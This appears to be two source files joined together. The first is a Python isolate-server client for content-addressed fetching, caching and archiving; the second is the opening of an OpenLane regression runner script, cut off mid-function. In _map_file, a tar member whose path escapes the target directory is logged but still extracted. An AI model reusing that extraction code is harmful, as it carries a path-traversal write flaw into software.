# 'touch' returns True if item is in cache and not corrupted.
if self.cache.touch(digest, size):
return
logging.error('%s is corrupted', digest)
self._fetched.remove(digest)
# TODO(maruel): It should look at the free disk space, the current cache
# size and the size of the new item on every new item:
# - Trim the cache as more entries are listed when free disk space is low,
# otherwise if the amount of data downloaded during the run > free disk
# space, it'll crash.
# - Make sure there's enough free disk space to fit all dependencies of
# this run! If not, abort early.
# Start fetching.
self._pending.add(digest)
self.storage.async_fetch(
self._channel, priority, digest, size,
functools.partial(self.cache.write, digest))
def wait_on(self, digest):
"""Updates digests to be waited on by 'wait'."""
# Calculate once the already fetched items. These will be retrieved first.
if digest in self._fetched:
self._waiting_on_ready.add(digest)
else:
self._waiting_on.add(digest)
def wait(self):
"""Waits until any of waited-on items is retrieved.
Once this happens, it is remove from the waited-on set and returned.
This function is called in two waves. The first wave it is done for HIGH
priority items, the isolated files themselves. The second wave it is called
for all the files.
If the waited-on set is empty, raises RuntimeError.
"""
# Flush any already fetched items.
if self._waiting_on_ready:
return self._waiting_on_ready.pop()
assert self._waiting_on, 'Needs items to wait on'
# Wait for one waited-on item to be fetched.
while self._pending:
digest = self._channel.next()
self._pending.remove(digest)
self._fetched.add(digest)
if digest in self._waiting_on:
self._waiting_on.remove(digest)
return digest
# Should never reach this point due to assert above.
raise RuntimeError('Impossible state')
@property
def wait_queue_empty(self):
"""Returns True if there is no digest left for wait() to return."""
return not self._waiting_on and not self._waiting_on_ready
def inject_local_file(self, path, algo):
"""Adds local file to the cache as if it was fetched from storage."""
with fs.open(path, 'rb') as f:
data = f.read()
digest = algo(data).hexdigest()
self.cache.write(digest, [data])
self._fetched.add(digest)
return digest
@property
def pending_count(self):
"""Returns number of items to be fetched."""
return len(self._pending)
def verify_all_cached(self):
"""True if all accessed items are in cache."""
# Not thread safe, but called after all work is done.
return self._accessed.issubset(self.cache)
class FetchStreamVerifier(object):
"""Verifies that fetched file is valid before passing it to the
ContentAddressedCache.
"""
def __init__(self, stream, hasher, expected_digest, expected_size):
"""Initializes the verifier.
Arguments:
* stream: an iterable yielding chunks of content
* hasher: an object from hashlib that supports update() and hexdigest()
(eg, hashlib.sha1).
* expected_digest: if the entire stream is piped through hasher and then
summarized via hexdigest(), this should be the result. That is, it
should be a hex string like 'abc123'.
* expected_size: either the expected size of the stream, or
local_caching.UNKNOWN_FILE_SIZE.
"""
assert stream is not None
self.stream = stream
self.expected_digest = expected_digest
self.expected_size = expected_size
self.current_size = 0
self.rolling_hash = hasher()
def run(self):
"""Generator that yields same items as |stream|.
Verifies |stream| is complete before yielding a last chunk to consumer.
Also wraps IOError produced by consumer into MappingError exceptions since
otherwise Storage will retry fetch on unrelated local cache errors.
"""
# Read one chunk ahead, keep it in |stored|.
# That way a complete stream can be verified before pushing last chunk
# to consumer.
stored = None
for chunk in self.stream:
assert chunk is not None
if stored is not None:
self._inspect_chunk(stored, is_last=False)
try:
yield stored
except IOError as exc:
raise isolated_format.MappingError(
'Failed to store an item in cache: %s' % exc)
stored = chunk
if stored is not None:
self._inspect_chunk(stored, is_last=True)
try:
yield stored
except IOError as exc:
raise isolated_format.MappingError(
'Failed to store an item in cache: %s' % exc)
def _inspect_chunk(self, chunk, is_last):
"""Called for each fetched chunk before passing it to consumer."""
self.current_size += len(chunk)
self.rolling_hash.update(chunk)
if not is_last:
return
if ((self.expected_size != local_caching.UNKNOWN_FILE_SIZE) and
(self.expected_size != self.current_size)):
msg = 'Incorrect file size: want %d, got %d' % (
self.expected_size, self.current_size)
raise IOError(msg)
actual_digest = self.rolling_hash.hexdigest()
if self.expected_digest != actual_digest:
msg = 'Incorrect digest: want %s, got %s' % (
self.expected_digest, actual_digest)
raise IOError(msg)
class IsolatedBundle(object):
"""Fetched and parsed .isolated file with all dependencies."""
def __init__(self, filter_cb):
"""
filter_cb: callback function to filter downloaded content.
When filter_cb is not None, Isolated file is downloaded iff
filter_cb(filepath) returns True.
"""
self.command = []
self.files = {}
self.read_only = None
self.relative_cwd = None
# The main .isolated file, a IsolatedFile instance.
self.root = None
self._filter_cb = filter_cb
def fetch(self, fetch_queue, root_isolated_hash, algo):
"""Fetches the .isolated and all the included .isolated.
It enables support for "included" .isolated files. They are processed in
strict order but fetched asynchronously from the cache. This is important so
that a file in an included .isolated file that is overridden by an embedding
.isolated file is not fetched needlessly. The includes are fetched in one
pass and the files are fetched as soon as all the ones on the left-side
of the tree were fetched.
The prioritization is very important here for nested .isolated files.
'includes' have the highest priority and the algorithm is optimized for both
deep and wide trees. A deep one is a long link of .isolated files referenced
one at a time by one item in 'includes'. A wide one has a large number of
'includes' in a single .isolated file. 'left' is defined as an included
.isolated file earlier in the 'includes' list. So the order of the elements
in 'includes' is important.
As a side effect this method starts asynchronous fetch of all data files
by adding them to |fetch_queue|. It doesn't wait for data files to finish
fetching though.
"""
self.root = isolated_format.IsolatedFile(root_isolated_hash, algo)
# Isolated files being retrieved now: hash -> IsolatedFile instance.
pending = {}
# Set of hashes of already retrieved items to refuse recursive includes.
seen = set()
# Set of IsolatedFile's whose data files have already being fetched.
processed = set()
def retrieve_async(isolated_file):
"""Retrieves an isolated file included by the root bundle."""
h = isolated_file.obj_hash
if h in seen:
raise isolated_format.IsolatedError(
'IsolatedFile %s is retrieved recursively' % h)
assert h not in pending
seen.add(h)
pending[h] = isolated_file
# This isolated item is being added dynamically, notify FetchQueue.
fetch_queue.wait_on(h)
fetch_queue.add(h, priority=threading_utils.PRIORITY_HIGH)
# Start fetching root *.isolated file (single file, not the whole bundle).
retrieve_async(self.root)
while pending:
# Wait until some *.isolated file is fetched, parse it.
item_hash = fetch_queue.wait()
item = pending.pop(item_hash)
with fetch_queue.cache.getfileobj(item_hash) as f:
item.load(f.read())
# Start fetching included *.isolated files.
for new_child in item.children:
retrieve_async(new_child)
# Always fetch *.isolated files in traversal order, waiting if necessary
# until next to-be-processed node loads. "Waiting" is done by yielding
# back to the outer loop, that waits until some *.isolated is loaded.
for node in isolated_format.walk_includes(self.root):
if node not in processed:
# Not visited, and not yet loaded -> wait for it to load.
if not node.is_loaded:
break
# Not visited and loaded -> process it and continue the traversal.
self._start_fetching_files(node, fetch_queue)
processed.add(node)
# All *.isolated files should be processed by now and only them.
all_isolateds = set(isolated_format.walk_includes(self.root))
assert all_isolateds == processed, (all_isolateds, processed)
assert fetch_queue.wait_queue_empty, 'FetchQueue should have been emptied'
# Extract 'command' and other bundle properties.
for node in isolated_format.walk_includes(self.root):
self._update_self(node)
self.relative_cwd = self.relative_cwd or ''
def _start_fetching_files(self, isolated, fetch_queue):
"""Starts fetching files from |isolated| that are not yet being fetched.
Modifies self.files.
"""
files = isolated.data.get('files', {})
logging.debug('fetch_files(%s, %d)', isolated.obj_hash, len(files))
for filepath, properties in files.items():
if self._filter_cb and not self._filter_cb(filepath):
continue
# Root isolated has priority on the files being mapped. In particular,
# overridden files must not be fetched.
if filepath not in self.files:
self.files[filepath] = properties
# Make sure if the isolated is read only, the mode doesn't have write
# bits.
if 'm' in properties and self.read_only:
properties['m'] &= ~(stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH)
# Preemptively request hashed files.
if 'h' in properties:
fetch_queue.add(
properties['h'], properties['s'], threading_utils.PRIORITY_MED)
def _update_self(self, node):
"""Extracts bundle global parameters from loaded *.isolated file.
Will be called with each loaded *.isolated file in order of traversal of
isolated include graph (see isolated_format.walk_includes).
"""
# Grabs properties.
if not self.command and node.data.get('command'):
# Ensure paths are correctly separated on windows.
self.command = node.data['command']
if self.command:
self.command[0] = self.command[0].replace('/', os.path.sep)
if self.read_only is None and node.data.get('read_only') is not None:
self.read_only = node.data['read_only']
if (self.relative_cwd is None and
node.data.get('relative_cwd') is not None):
self.relative_cwd = node.data['relative_cwd']
def get_storage(server_ref):
"""Returns Storage class that can upload and download from |namespace|.
Arguments:
server_ref: isolate_storage.ServerRef instance.
Returns:
Instance of Storage.
"""
assert isinstance(server_ref, isolate_storage.ServerRef), repr(server_ref)
return Storage(isolate_storage.get_storage_api(server_ref))
def _map_file(dst, digest, props, cache, read_only, use_symlinks):
"""Put downloaded file to destination path. This function is used for multi
threaded file putting.
"""
with tools.Profiler("_map_file for %s" % dst):
with cache.getfileobj(digest) as srcfileobj:
filetype = props.get('t', 'basic')
if filetype == 'basic':
# Ignore all bits apart from the user.
file_mode = (props.get('m') or 0o500) & 0o700
if read_only:
# Enforce read-only if the root bundle does.
file_mode &= 0o500
putfile(srcfileobj, dst, file_mode, use_symlink=use_symlinks)
elif filetype == 'tar':
basedir = os.path.dirname(dst)
with tarfile.TarFile(fileobj=srcfileobj, encoding='utf-8') as t:
ensured_dirs = set()
for ti in t:
if not ti.isfile():
logging.warning('Path(%r) is nonfile (%s), skipped', ti.name,
ti.type)
continue
# Handle files created on Windows fetched on POSIX and the
# reverse.
other_sep = '/' if os.path.sep == '\\' else '\\'
name = ti.name.replace(other_sep, os.path.sep)
fp = os.path.normpath(os.path.join(basedir, name))
if not fp.startswith(basedir):
logging.error('Path(%r) is outside root directory', fp)
ifd = t.extractfile(ti)
fp_dir = os.path.dirname(fp)
if fp_dir not in ensured_dirs:
file_path.ensure_tree(fp_dir)
ensured_dirs.add(fp_dir)
file_mode = ti.mode & 0o700
if read_only:
# Enforce read-only if the root bundle does.
file_mode &= 0o500
putfile(ifd, fp, file_mode, ti.size)
else:
raise isolated_format.IsolatedError('Unknown file type %r' % filetype)
def fetch_isolated(isolated_hash, storage, cache, outdir, use_symlinks,
filter_cb=None):
"""Aggressively downloads the .isolated file(s), then download all the files.
Arguments:
isolated_hash: hash of the root *.isolated file.
storage: Storage class that communicates with isolate storage.
cache: ContentAddressedCache class that knows how to store and map files
locally.
outdir: Output directory to map file tree to.
use_symlinks: Use symlinks instead of hardlinks when True.
filter_cb: filter that works as whitelist for downloaded files.
Returns:
IsolatedBundle object that holds details about loaded *.isolated file.
"""
logging.debug(
'fetch_isolated(%s, %s, %s, %s, %s)',
isolated_hash, storage, cache, outdir, use_symlinks)
# Hash algorithm to use, defined by namespace |storage| is using.
algo = storage.server_ref.hash_algo
fetch_queue = FetchQueue(storage, cache)
bundle = IsolatedBundle(filter_cb)
with tools.Profiler('GetIsolateds'):
# Optionally support local files by manually adding them to cache.
if not isolated_format.is_valid_hash(isolated_hash, algo):
logging.debug('%s is not a valid hash, assuming a file '
'(algo was %s, hash size was %d)',
isolated_hash, algo(), algo().digest_size)
path = six.text_type(os.path.abspath(isolated_hash))
try:
isolated_hash = fetch_queue.inject_local_file(path, algo)
except IOError as e:
raise isolated_format.MappingError(
'%s doesn\'t seem to be a valid file. Did you intent to pass a '
'valid hash (error: %s)?' % (isolated_hash, e))
# Load all *.isolated and start loading rest of the files.
bundle.fetch(fetch_queue, isolated_hash, algo)
with tools.Profiler('GetRest'):
# Create file system hierarchy.
file_path.ensure_tree(outdir)
create_directories(outdir, bundle.files)
_create_symlinks(outdir, bundle.files.items())
# Ensure working directory exists.
cwd = os.path.normpath(os.path.join(outdir, bundle.relative_cwd))
file_path.ensure_tree(cwd)
# Multimap: digest -> list of pairs (path, props).
remaining = {}
for filepath, props in bundle.files.items():
if 'h' in props:
remaining.setdefault(props['h'], []).append((filepath, props))
fetch_queue.wait_on(props['h'])
# Now block on the remaining files to be downloaded and mapped.
logging.info('Retrieving remaining files (%d of them)...',
fetch_queue.pending_count)
last_update = time.time()
with threading_utils.ThreadPool(2, 32, 32) as putfile_thread_pool:
with threading_utils.DeadlockDetector(DEADLOCK_TIMEOUT) as detector:
while remaining:
detector.ping()
# Wait for any item to finish fetching to cache.
digest = fetch_queue.wait()
# Create the files in the destination using item in cache as the
# source.
for filepath, props in remaining.pop(digest):
fullpath = os.path.join(outdir, filepath)
putfile_thread_pool.add_task(threading_utils.PRIORITY_HIGH,
_map_file, fullpath, digest,
props, cache, bundle.read_only,
use_symlinks)
# Report progress.
duration = time.time() - last_update
if duration > DELAY_BETWEEN_UPDATES_IN_SECS:
msg = '%d files remaining...' % len(remaining)
sys.stdout.write(msg + '\n')
sys.stdout.flush()
logging.info(msg)
last_update = time.time()
assert fetch_queue.wait_queue_empty, 'FetchQueue should have been emptied'
putfile_thread_pool.join()
# Save the cache right away to not loose the state of the new objects.
cache.save()
# Cache could evict some items we just tried to fetch, it's a fatal error.
if not fetch_queue.verify_all_cached():
free_disk = file_path.get_free_space(cache.cache_dir)
msg = (
'Cache is too small to hold all requested files.\n'
' %s\n cache=%dbytes, %d items; %sb free_space') % (
cache.policies, cache.total_size, len(cache), free_disk)
raise isolated_format.MappingError(msg)
return bundle
def _directory_to_metadata(root, algo, blacklist):
"""Yields every file and/or symlink found.
Yields:
tuple(FileItem, relpath, metadata)
For a symlink, FileItem is None.
"""
# Current tar file bundle, if any.
root = file_path.get_native_path_case(root)
bundle = TarBundle(root, algo)
for relpath, issymlink in isolated_format.expand_directory_and_symlink(
root,
u'.' + os.path.sep,
blacklist,
follow_symlinks=(sys.platform != 'win32')):
filepath = os.path.join(root, relpath)
if issymlink:
# TODO(maruel): Do not call this.
meta = isolated_format.file_to_metadata(filepath, 0, False)
yield None, relpath, meta
continue
prio = relpath.endswith('.isolated')
if bundle.try_add(FileItem(path=filepath, algo=algo, high_priority=prio)):
# The file was added to the current pending tarball and won't be archived
# individually.
continue
# Flush and reset the bundle.
for i, p, m in bundle.yield_item_path_meta():
yield i, p, m
bundle = TarBundle(root, algo)
# Yield the file individually.
item = FileItem(path=filepath, algo=algo, size=None, high_priority=prio)
yield item, relpath, item.meta
for i, p, m in bundle.yield_item_path_meta():
yield i, p, m
def _print_upload_stats(items, missing):
"""Prints upload stats."""
total = len(items)
total_size = sum(f.size for f in items)
logging.info(
'Total: %6d, %9.1fkiB', total, total_size / 1024.)
cache_hit = set(items).difference(missing)
cache_hit_size = sum(f.size for f in cache_hit)
logging.info(
'cache hit: %6d, %9.1fkiB, %6.2f%% files, %6.2f%% size',
len(cache_hit),
cache_hit_size / 1024.,
len(cache_hit) * 100. / total,
cache_hit_size * 100. / total_size if total_size else 0)
cache_miss = missing
cache_miss_size = sum(f.size for f in cache_miss)
logging.info(
'cache miss: %6d, %9.1fkiB, %6.2f%% files, %6.2f%% size',
len(cache_miss),
cache_miss_size / 1024.,
len(cache_miss) * 100. / total,
cache_miss_size * 100. / total_size if total_size else 0)
def _enqueue_dir(dirpath, blacklist, hash_algo, hash_algo_name):
"""Called by archive_files_to_storage for a directory.
Create an .isolated file.
Yields:
FileItem for every file found, plus one for the .isolated file itself.
"""
files = {}
for item, relpath, meta in _directory_to_metadata(
dirpath, hash_algo, blacklist):
# item is None for a symlink.
files[relpath] = meta
if item:
yield item
# TODO(maruel): If there' not file, don't yield an .isolated file.
data = {
'algo': hash_algo_name,
'files': files,
'version': isolated_format.ISOLATED_FILE_VERSION,
}
# Keep the file in memory. This is fine because .isolated files are relatively
# small.
yield BufferItem(
tools.format_json(data, True), algo=hash_algo, high_priority=True)
def archive_files_to_storage(storage, files, blacklist):
"""Stores every entry into remote storage and returns stats.
Arguments:
storage: a Storage object that communicates with the remote object store.
files: iterable of files to upload. If a directory is specified (with a
trailing slash), a .isolated file is created and its hash is returned.
Duplicates are skipped.
blacklist: function that returns True if a file should be omitted.
Returns:
tuple(OrderedDict(path: hash), list(FileItem cold), list(FileItem hot)).
The first file in the first item is always the .isolated file.
"""
# Dict of path to hash.
results = collections.OrderedDict()
hash_algo = storage.server_ref.hash_algo
hash_algo_name = storage.server_ref.hash_algo_name
# Generator of FileItem to pass to upload_items() concurrent operation.
channel = threading_utils.TaskChannel()
uploaded_digests = set()
def _upload_items():
results = storage.upload_items(channel)
uploaded_digests.update(f.digest for f in results)
t = threading.Thread(target=_upload_items)
t.start()
# Keep track locally of the items to determine cold and hot items.
items_found = []
try:
for f in files:
assert isinstance(f, six.text_type), repr(f)
if f in results:
# Duplicate
continue
try:
filepath = os.path.abspath(f)
if fs.isdir(filepath):
# Uploading a whole directory.
item = None
for item in _enqueue_dir(
filepath, blacklist, hash_algo, hash_algo_name):
channel.send_result(item)
items_found.append(item)
# The very last item will be the .isolated file.
if not item:
# There was no file in the directory.
continue
elif fs.isfile(filepath):
item = FileItem(
path=filepath,
algo=hash_algo,
size=None,
high_priority=f.endswith('.isolated'))
channel.send_result(item)
items_found.append(item)
else:
raise Error('%s is neither a file or directory.' % f)
results[f] = item.digest
except OSError:
raise Error('Failed to process %s.' % f)
finally:
# Stops the generator, so _upload_items() can exit.
channel.send_done()
t.join()
cold = []
hot = []
for i in items_found:
# Note that multiple FileItem may have the same .digest.
if i.digest in uploaded_digests:
cold.append(i)
else:
hot.append(i)
return results, cold, hot
@subcommand.usage('<file1..fileN> or - to read from stdin')
def CMDarchive(parser, args):
"""Archives data to the server.
If a directory is specified, a .isolated file is created the whole directory
is uploaded. Then this .isolated file can be included in another one to run
commands.
The commands output each file that was processed with its content hash. For
directories, the .isolated generated for the directory is listed as the
directory entry itself.
"""
add_isolate_server_options(parser)
add_archive_options(parser)
options, files = parser.parse_args(args)
process_isolate_server_options(parser, options, True, True)
server_ref = isolate_storage.ServerRef(
options.isolate_server, options.namespace)
if files == ['-']:
files = (l.rstrip('\n\r') for l in sys.stdin)
if not files:
parser.error('Nothing to upload')
files = (f.decode('utf-8') for f in files)
blacklist = tools.gen_blacklist(options.blacklist)
try:
with get_storage(server_ref) as storage:
results, _cold, _hot = archive_files_to_storage(storage, files, blacklist)
except (Error, local_caching.NoMoreSpace) as e:
parser.error(e.args[0])
print('\n'.join('%s %s' % (h, f) for f, h in results.items()))
return 0
def CMDdownload(parser, args):
"""Download data from the server.
It can either download individual files or a complete tree from a .isolated
file.
"""
add_isolate_server_options(parser)
parser.add_option(
'-s', '--isolated', metavar='HASH',
help='hash of an isolated file, .isolated file content is discarded, use '
'--file if you need it')
parser.add_option(
'-f', '--file', metavar='HASH DEST', default=[], action='append', nargs=2,
help='hash and destination of a file, can be used multiple times')
parser.add_option(
'-t', '--target', metavar='DIR', default='download',
help='destination directory')
parser.add_option(
'--use-symlinks', action='store_true',
help='Use symlinks instead of hardlinks')
add_cache_options(parser)
options, args = parser.parse_args(args)
if args:
parser.error('Unsupported arguments: %s' % args)
if not file_path.enable_symlink():
logging.warning('Symlink support is not enabled')
process_isolate_server_options(parser, options, True, True)
if bool(options.isolated) == bool(options.file):
parser.error('Use one of --isolated or --file, and only one.')
if not options.cache and options.use_symlinks:
parser.error('--use-symlinks require the use of a cache with --cache')
cache = process_cache_options(options, trim=True)
cache.cleanup()
options.target = six.text_type(os.path.abspath(options.target))
if options.isolated:
if (fs.isfile(options.target) or
(fs.isdir(options.target) and fs.listdir(options.target))):
parser.error(
'--target \'%s\' exists, please use another target' % options.target)
server_ref = isolate_storage.ServerRef(
options.isolate_server, options.namespace)
with get_storage(server_ref) as storage:
# Fetching individual files.
if options.file:
# TODO(maruel): Enable cache in this case too.
channel = threading_utils.TaskChannel()
pending = {}
for digest, dest in options.file:
dest = six.text_type(dest)
pending[digest] = dest
storage.async_fetch(
channel,
threading_utils.PRIORITY_MED,
digest,
local_caching.UNKNOWN_FILE_SIZE,
functools.partial(
local_caching.file_write, os.path.join(options.target, dest)))
while pending:
fetched = channel.next()
dest = pending.pop(fetched)
logging.info('%s: %s', fetched, dest)
# Fetching whole isolated tree.
if options.isolated:
bundle = fetch_isolated(
isolated_hash=options.isolated,
storage=storage,
cache=cache,
outdir=options.target,
use_symlinks=options.use_symlinks)
cache.trim()
if bundle.command:
rel = os.path.join(options.target, bundle.relative_cwd)
print('To run this test please run from the directory %s:' %
os.path.join(options.target, rel))
print(' ' + ' '.join(bundle.command))
return 0
def add_archive_options(parser):
parser.add_option(
'--blacklist',
action='append', default=list(DEFAULT_BLACKLIST),
help='List of regexp to use as blacklist filter when uploading '
'directories')
def add_isolate_server_options(parser):
"""Adds --isolate-server and --namespace options to parser."""
parser.add_option(
'-I', '--isolate-server',
metavar='URL', default=os.environ.get('ISOLATE_SERVER', ''),
help='URL of the Isolate Server to use. Defaults to the environment '
'variable ISOLATE_SERVER if set. No need to specify https://, this '
'is assumed.')
parser.add_option(
'--grpc-proxy', help='gRPC proxy by which to communicate to Isolate')
parser.add_option(
'--namespace', default='default-gzip',
help='The namespace to use on the Isolate Server, default: %default')
def process_isolate_server_options(
parser, options, set_exception_handler, required):
"""Processes the --isolate-server option.
Returns the identity as determined by the server.
"""
if not options.isolate_server:
if required:
parser.error('--isolate-server is required.')
return
if options.grpc_proxy:
isolate_storage.set_grpc_proxy(options.grpc_proxy)
else:
try:
options.isolate_server = net.fix_url(options.isolate_server)
except ValueError as e:
parser.error('--isolate-server %s' % e)
if set_exception_handler:
on_error.report_on_exception_exit(options.isolate_server)
try:
return auth.ensure_logged_in(options.isolate_server)
except ValueError as e:
parser.error(str(e))
return None
def add_cache_options(parser):
cache_group = optparse.OptionGroup(parser, 'Cache management')
cache_group.add_option(
'--cache', metavar='DIR', default='cache',
help='Directory to keep a local cache of the files. Accelerates download '
'by reusing already downloaded files. Default=%default')
cache_group.add_option(
'--max-cache-size',
type='int',
metavar='NNN',
default=50*1024*1024*1024,
help='Trim if the cache gets larger than this value, default=%default')
cache_group.add_option(
'--min-free-space',
type='int',
metavar='NNN',
default=2*1024*1024*1024,
help='Trim if disk free space becomes lower than this value, '
'default=%default')
cache_group.add_option(
'--max-items',
type='int',
metavar='NNN',
default=100000,
help='Trim if more than this number of items are in the cache '
'default=%default')
parser.add_option_group(cache_group)
def process_cache_options(options, trim, **kwargs):
if options.cache:
policies = local_caching.CachePolicies(
options.max_cache_size,
options.min_free_space,
options.max_items,
# 3 weeks.
max_age_secs=21*24*60*60)
# |options.cache| path may not exist until DiskContentAddressedCache()
# instance is created.
return local_caching.DiskContentAddressedCache(
six.text_type(os.path.abspath(options.cache)), policies, trim, **kwargs)
return local_caching.MemoryContentAddressedCache()
class OptionParserIsolateServer(logging_utils.OptionParserWithLogging):
def __init__(self, **kwargs):
logging_utils.OptionParserWithLogging.__init__(
self,
version=__version__,
prog=os.path.basename(sys.modules[__name__].__file__),
**kwargs)
auth.add_auth_options(self)
def parse_args(self, *args, **kwargs):
options, args = logging_utils.OptionParserWithLogging.parse_args(
self, *args, **kwargs)
auth.process_auth_options(self, options)
return options, args
def main(args):
dispatcher = subcommand.CommandDispatcher(__name__)
return dispatcher.execute(OptionParserIsolateServer(), args)
if __name__ == '__main__':
subprocess42.inhibit_os_error_reporting()
fix_encoding.fix_encoding()
tools.disable_buffering()
colorama.init()
sys.exit(main(sys.argv[1:]))
|
run_designs.py
|
# Copyright 2020 Efabless Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import copy
import time
import queue
import logging
import datetime
import argparse
import threading
import subprocess
from collections import OrderedDict
from scripts.report.report import Report
from scripts.config.config import ConfigHandler
import scripts.utils.utils as utils
parser = argparse.ArgumentParser(description="Run multiple designs in parallel, for testing or exploration.")
parser.add_argument(
"--config_tag", "-c", action="store", default="config", help="config file"
)
parser.add_argument(
"--regression", "-r", action="store", default=None, help="regression file"
)
parser.add_argument(
"--designs", "-d", nargs="+", default=["spm"], help="designs to run"
)
parser.add_argument(
"--tag", "-t", action="store", default="regression", help="tag the log file"
)
parser.add_argument(
"--threads",
"-th",
action="store",
type=int,
default=5,
help="number of designs in parallel",
)
parser.add_argument(
"--configuration_parameters",
"-cp",
action="store",
default=None,
help="file containing configuration parameters to write in report, to report all possible configurations add: all ",
)
parser.add_argument(
"--append_configurations",
"-app",
action="store_true",
default=False,
help="append configuration parameters provided to the existing default printed configurations",
)
parser.add_argument(
"--clean",
"-cl",
action="store_true",
default=False,
help="cleans all intermediate files in runs",
)
parser.add_argument(
"--delete",
"-dl",
action="store_true",
default=False,
help="deletes the whole run directory upon completion leaving only the final_report.txt file",
)
parser.add_argument(
"--tarList",
"-tar",
nargs="+",
default=None,
help="tars the specified sub directories and deletes the whole directory leaving only the compressed version",
)
parser.add_argument(
"--htmlExtract",
"-html",
action="store_true",
default=False,
help="An option to extract an html summary of the final csv summary",
)
parser.add_argument(
"--defaultTestSet",
"-dts",
action="store_true",
default=False,
help="Runs the default test set (all designs under ./designs/) to generate the regression sheet",
)
parser.add_argument(
"--excluded_designs",
"-e",
nargs="+",
default=[],
help="designs to exclude from the run",
)
parser.add_argument(
"--benchmark",
"-b",
action="store",
default=None,
help="benchmark report file to compare with",
)
parser.add_argument(
"--print_rem",
"-p",
action="store",
default=None,
help="Takes a time period, and prints the list of remaining designs periodically based on it",
)
parser.add_argument(
"--disable_timestamp",
"-dt",
action="store_true",
default=False,
help="Disables appending the timestamp to the file names and tags.",
)
parser.add_argument(
"--show_output",
"-so",
action="store_true",
default=False,
help="Enables showing the ./flow.tcl output into the stdout. If more than one design/more than one configuration is run, this flag will be treated as False, even if specified otherwise.",
)
args = parser.parse_args()
regression = args.regression
tag = args.tag
if args.defaultTestSet:
designs = [x for x in os.listdir("./designs/")]
for i in designs:
if os.path.isdir("./designs/" + i) == False:
designs.remove(i)
else:
designs = list(OrderedDict.fromkeys(args.designs))
excluded_designs = list(OrderedDict.fromkeys(args.excluded_designs))
for excluded_design in excluded_designs:
if excluded_design in designs:
designs.remove(excluded_design)
show_log_output = args.show_output & (len(designs) == 1) & (args.regression is None)
if args.print_rem is not None and show_log_output == False:
if float(args.print_rem) > 0:
mutex = threading.Lock()
print_rem_time = float(args.print_rem)
else:
print_rem_time = None
else:
print_rem_time = None
if print_rem_time is not None:
rem_designs = dict.fromkeys(designs, 1)
num_workers = args.threads
config = args.config_tag
tarList = [""]
if args.tarList is not None:
tarList = list(OrderedDict.fromkeys(args.tarList))
if args.regression is not None:
regressionConfigurationsList = []
regressionFileOpener = open(regression, "r")
regressionFileContent = regressionFileOpener.read().split()
regressionFileOpener.close()
for k in regressionFileContent:
if k.find("=") == -1:
continue
if k.find("extra") != -1:
break
else:
regressionConfigurationsList.append(k.split("=")[0])
if len(regressionConfigurationsList):
ConfigHandler.update_configuration_values(regressionConfigurationsList, True)
if args.configuration_parameters is not None:
if args.configuration_parameters == "all":
ConfigHandler.update_configuration_values_to_all(args.append_configurations)
else:
try:
tmpFile = open(args.configuration_parameters, "r")
if tmpFile.mode == "r":
configuration_parameters = tmpFile.read().split(",")
ConfigHandler.update_configuration_values(
configuration_parameters, args.append_configurations
)
except OSError:
print("Could not open/read file:", args.configuration_parameters)
sys.exit()
store_dir = ""
report_file_name = ""
if args.disable_timestamp:
store_dir = "./regression_results/{tag}/".format(tag=tag)
report_file_name = "{store_dir}/{tag}".format(store_dir=store_dir, tag=tag)
else:
store_dir = "./regression_results/{tag}_{date}/".format(
tag=tag, date=datetime.datetime.now().strftime("%d_%m_%Y_%H_%M")
)
report_file_name = "{store_dir}/{tag}_{date}".format(
store_dir=store_dir,
tag=tag,
date=datetime.datetime.now().strftime("%d_%m_%Y_%H_%M"),
)
if os.path.exists(store_dir) == False:
os.makedirs(store_dir, exist_ok=True)
log = logging.getLogger("log")
log_formatter = logging.Formatter("[%(asctime)s - %(levelname)5s] %(message)s")
handler1 = logging.FileHandler(
"{report_file_name}.log".format(report_file_name=report_file_name), "w"
)
handler1.setFormatter(log_formatter)
log.addHandler(handler1)
handler2 = logging.StreamHandler()
handler2.setFormatter(log_formatter)
log.addHandler(handler2)
log.setLevel(logging.INFO)
report_log = logging.getLogger("report_log")
report_formatter = logging.Formatter("%(message)s")
report_handler = logging.FileHandler(
"{report_file_name}.csv".format(report_file_name=report_file_name), "w"
)
report_handler.setFormatter(report_formatter)
report_log.addHandler(report_handler)
report_log.setLevel(logging.INFO)
report_log.info(Report.get_header() + "," + ConfigHandler.get_header())
allow_print_rem_designs = False
def printRemDesignList():
t = threading.Timer(print_rem_time, printRemDesignList)
t.start()
if allow_print_rem_designs:
print("Remaining designs (design, # of times): ", rem_designs)
if len(rem_designs) == 0:
t.cancel()
def rmDesignFromPrintList(design):
if design in rem_designs.keys():
mutex.acquire()
try:
rem_designs[design] -= 1
if rem_designs[design] == 0:
rem_designs.pop(design)
finally:
mutex.release()
if print_rem_time is not None:
printRemDesignList()
allow_print_rem_designs = True
def run_design(designs_queue):
while not designs_queue.empty():
design, config, tag, design_name = designs_queue.get(timeout=3) # 3s timeout
run_path = utils.get_run_path(design=design, tag=tag)
log.info("{design} {tag} running".format(design=design, tag=tag))
command = ""
if show_log_output:
command = "{ol_entry} -design {design} -tag {tag} -overwrite -config_tag {config} -no_save".format(
ol_entry=os.getenv("OPENLANE_ENTRY") or "./flow.tcl",
design=design,
tag=tag,
config=config,
)
else:
command = "{ol_entry} -design {design} -tag {tag} -overwrite -disable_output -config_tag {config} -no_save".format(
ol_entry=os.getenv("OPENLANE_ENTRY") or "./flow.tcl",
design=design,
tag=tag,
config=config,
)
skip_rm_from_rems = False
try:
if show_log_output:
process = subprocess.Popen(
command.split(), stderr=subprocess.PIPE, stdout=subprocess.PIPE
)
while True:
output = process.stdout.readline()
if not output:
break
if output:
print(str(output.strip())[2:-1])
else:
subprocess.check_output(command.split(), stderr=subprocess.PIPE)
except subprocess.CalledProcessError as e:
if print_rem_time is not None:
rmDesignFromPrintList(design)
skip_rm_from_rems = True
error_msg = e.stderr.decode(sys.getfilesystemencoding())
log.error(
"{design} {tag} failed check {run_path}error.txt".format(
design=design, run_path=run_path, tag=tag
)
)
with open(run_path + "error.txt", "w") as error_file:
error_file.write(error_msg)
if print_rem_time is not None and not skip_rm_from_rems:
